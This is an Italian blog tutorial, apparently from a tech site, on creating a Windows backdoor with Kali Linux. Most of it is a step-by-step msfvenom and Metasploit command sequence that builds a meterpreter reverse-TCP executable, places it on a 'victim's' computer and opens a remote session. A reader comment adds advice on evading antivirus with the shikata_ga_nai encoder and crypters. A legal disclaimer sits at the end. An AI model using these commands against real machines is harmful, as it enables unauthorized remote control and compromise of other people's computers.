
Creare una backdoor manualmente con Kali Linux
Oggi ho intenzione di spiegarvi il procedimento mediante il quale possiamo noi stessi creare una backdoor manualmente con Kali Linux, senza far uso dei “consueti comandi” che portano a termine l’attacco autonomamente. Per farlo ricordo di ricorrere a Kali Linux, che come noterete è il principale punto di riferimento per svolgere questo tipo di attacchi. Il funzionamento della procedura che stiamo per andare ad analizzare è abbastanza semplice; si tratta di creare una backdoor alla quale potremo darle qualsiasi tipo di formato, ma visto che ci troviamo a che fare con PC il più raccomandato è di certo il .exe; successivamente Kali creerà il file che noi andremo a trasferire manualmente sul computer della vittima e a quel punto potremo andare ad avviare l’exploit dal terminale. Ma dopo questa spiegazione passiamo alla pratica, per chiarire l’argomento.
Come primo passo andremo ad aprire un terminale; una volta aperto andremo ad eseguire in successione una serie di comandi:
-msfvenom -p windows/meterpreter/reverse_tcp LHOST=(immettere indirizzo IP locale) LPORT=(immettere porta locale) R > “nome della backdoor.exe”
-Verrà quindi creato il file backdoor.exe
-msfconsole
andrà ad aprire l’interfaccia di Metasploit Framework
-use exploit/multi/handler
-set payload windows/meterpreter/reverse_tcp
-set LHOST (immettere indirizzo IP locale già scelto in precedenza)
-set LPORT (immettere la stessa porta locale scelta prima)
-Trasferire la backdoor sul computer della vittima
-exploit
Se tutto andrà bene, il nostro PC riuscirà a stabilire una connessione remota mediante questa “backdoor artigianale”. Potete venire a conoscenza di tutte le azioni che potete svolgere digitando come al solito il comando “help”
Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
2 Commenti
Lascia un commento Annulla risposta
I PIÙ LETTI
ARTICOLI RECENTI
Ma come sempre un file .exe è rilevato da un antivirus,quindi discorso da lasciar perdere.Comunque ottimo articolo.
Giusta osservazione. Però Se usi un encoder come shikata_ga_nai non è detto che venga rilevato. Per questo i crypter fatti bene costano un sacco di soldi.